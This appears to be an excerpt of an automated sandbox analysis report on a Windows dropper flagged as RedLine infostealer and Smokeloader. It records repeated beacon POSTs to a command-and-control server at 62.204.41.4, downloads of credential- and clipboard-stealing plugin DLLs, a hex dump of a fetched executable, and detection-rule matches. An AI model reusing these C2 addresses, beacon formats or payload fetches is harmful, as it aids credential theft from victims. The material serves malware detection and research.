                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 19:00:51 GMTContent-Type: application/octet-streamContent-Length: 91136Last-Modified: Fri, 03 Feb 2023 17:19:21 GMTConnection: keep-aliveETag: "63dd4219-16400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 18 8f 2c 43 79 e1 7f 43 79 e1 7f 43 79 e1 7f 18 11 e2 7e 49 79 e1 7f 18 11 e4 7e cb 79 e1 7f 18 11 e5 7e 51 79 e1 7f 96 14 e5 7e 4c 79 e1 7f 96 14 e2 7e 52 79 e1 7f 96 14 e4 7e 62 79 e1 7f 18 11 e0 7e 46 79 e1 7f 43 79 e0 7f 19 79 e1 7f d8 17 e8 7e 40 79 e1 7f d8 17 e1 7e 42 79 e1 7f d8 17 1e 7f 42 79 e1 7f d8 17 e3 7e 42 79 e1 7f 52 69 63 68 43 79 e1 7f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d4 38 dd 63 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 de 00 00 00 8c 00 00 00 00 00 00 00 3e 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 01 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 4a 01 00 9c 00 00 00 3c 4b 01 00 3c 00 00 00 00 80 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 54 10 00 00 20 3f 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 3f 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 dd 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ee 61 00 00 00 f0 00 00 00 62 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 14 00 00 00 60 01 00 00 0c 00 00 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 80 01 00 00 02 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 54 10 00 00 00 90 01 00 00 12 00 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: Joe Sandbox ViewASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI
                          Source: Joe Sandbox ViewIP Address: 62.204.41.4 62.204.41.4
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 11_2_01367F00 CreateMutexW,GetLastError,SetCurrentDirectoryA,CreateFileA,InternetOpenA,InternetOpenUrlA,InternetReadFile,WriteFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,RemoveDirectoryA,
                          Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1Host: 62.204.41.4
                          Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1Host: 62.204.41.4
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 19:00:50 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: xriv.exe, 0000000B.00000002.318710664.000000000165A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                          System Summary

                          barindex
                          Source: 2.2.afCf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 2.3.afCf.exe.6b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 2.2.afCf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 2.2.afCf.exe.660e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 00000002.00000003.262775984.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                          Source: 00000002.00000002.288363449.0000000000857000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB3BA2
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB5C9E
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeCode function: 1_2_00943BA2
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeCode function: 1_2_00945C9E
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00408C60
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0040DC11
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00407C3F
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00418CCC
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00406CA0
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_004028B0
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0041A4BE
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00418244
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00401650
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00402F20
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_004193C4
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00418788
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00402F89
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00402B90
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_004073A0
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0066786D
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_006618B7
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_006789EF
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_006631F0
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00663187
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00662B17
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_006784AB
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00662DF7
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0066DE78
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00668EC7
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00667EA6
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0067A725
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00678F33
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00666F07
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_006677D9
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00857000
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 11_2_01388530
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 11_2_0138754D
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 11_2_01366F40
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: 2.2.afCf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 2.3.afCf.exe.6b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 2.2.afCf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 2.2.afCf.exe.660e67.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 00000002.00000003.262775984.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                          Source: 00000002.00000002.288363449.0000000000857000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeCode function: 1_2_00941F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: String function: 01375E20 appears 130 times
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: String function: 01377CE0 appears 40 times
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: String function: 0040E1D8 appears 44 times
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: String function: 0066E43F appears 44 times
                          Source: file.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 380422 bytes, 2 files, at 0x2c +A "bfCg.exe" +A "xriv.exe", ID 1563, number 1, 18 datablocks, 0x1503 compression
                          Source: bfCg.exe.0.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 189540 bytes, 2 files, at 0x2c +A "afCf.exe" +A "nika.exe", ID 1523, number 1, 9 datablocks, 0x1503 compression
                          Source: file.exe, 00000000.00000003.250204509.0000000004A2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                          Source: file.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\afCf.exe.logJump to behavior
